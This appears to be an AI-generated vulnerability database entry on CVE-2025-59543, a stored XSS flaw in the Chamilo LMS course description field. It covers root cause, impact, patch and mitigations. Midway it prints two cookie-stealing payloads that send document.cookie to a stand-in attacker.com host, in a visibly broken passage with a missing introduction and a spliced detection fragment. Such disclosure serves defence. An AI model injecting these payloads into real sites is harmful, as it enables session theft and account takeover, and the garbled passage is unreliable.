
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-59543 is a stored cross-site scripting (XSS) vulnerability in Chamilo LMS, a widely used open-source learning management system. An attacker with a low-privileged account (e.g., a trainer) can inject malicious JavaScript into the course description field, which then executes in the browser of any user viewing the course information page, including administrators. All versions prior to 1.11.34 are affected, with the vulnerability specifically confirmed in v1.11.32. The issue was published on March 6, 2026, and patched in version 1.11.34. It carries a CVSS v3.1 base score of 9.0 (Critical) (GitHub Advisory, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a stored XSS variant. The root cause is insufficient sanitization of user-supplied input in the Course Management → Course Description field, allowing HTML/JavaScript to be persisted in the database and rendered unsanitized to other users. The fix in v1.11.34 includes a commit titled "Course description: Remove XSS when showing title" (PR #6662), confirming that output encoding was missing when displaying course description content. Exploitation requires only a low-privileged account (e.g., trainer role) and user interaction from a victim viewing the compromised course page (GitHub Advisory, Chamilo v1.11.34 Release).
Successful exploitation enables an attacker to execute arbitrary JavaScript in the browsers of other users, including administrators, leading to session cookie or token exfiltration and full account takeover (ATO) of higher-privileged users. This can result in privilege escalation from trainer to administrator, unauthorized access to user data, course content, and system configuration, and further compromise of the entire LMS instance. The CVSS score reflects high impacts across confidentiality, integrity, and availability due to the potential for complete administrative account compromise (GitHub Advisory).
No public proof-of-concept exploit code has been identified, and there is no evidence of in-the-wild exploitation at this time (Feedly). The EPSS score is approximately 0.041%, indicating a low current probability of exploitation in the wild. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, the low privilege requirement (any trainer account) and the high-value target (administrator session tokens) make this an attractive vector for insider threats or compromised low-privilege accounts.
<script>document.location='https://attacker.com/steal?c='+document.cookie;</script> or a more stealthy image-based payload like <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">.<script>, onerror, javascript:, or other HTML event handler attributes when inspected directly.Chamilo has released version 1.11.34 as a security-focused patch that removes XSS from the course description display (PR #6662). All users should upgrade to Chamilo LMS v1.11.34 or later immediately (Chamilo v1.11.34 Release). As interim mitigations prior to patching: restrict course creation and description editing permissions to only fully trusted users; implement a Content Security Policy (CSP) header to limit script execution sources; and audit existing course descriptions for suspicious HTML or JavaScript content. Additionally, enforcing the HttpOnly flag on session cookies can reduce the impact of successful XSS exploitation by preventing cookie theft via JavaScript.
The vulnerability was reported by security researcher prakhar0x01 and disclosed via GitHub Security Advisories on March 5–6, 2026 (GitHub Advisory). The Chamilo maintainer ywarnier published the advisory and the fix was included in the v1.11.34 release, described as "mostly a security release" (Chamilo v1.11.34 Release). Brief community coverage appeared on Mastodon via @thehackerwire and was indexed by threat intelligence aggregators including ENISA EUVD and VulDB shortly after disclosure.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."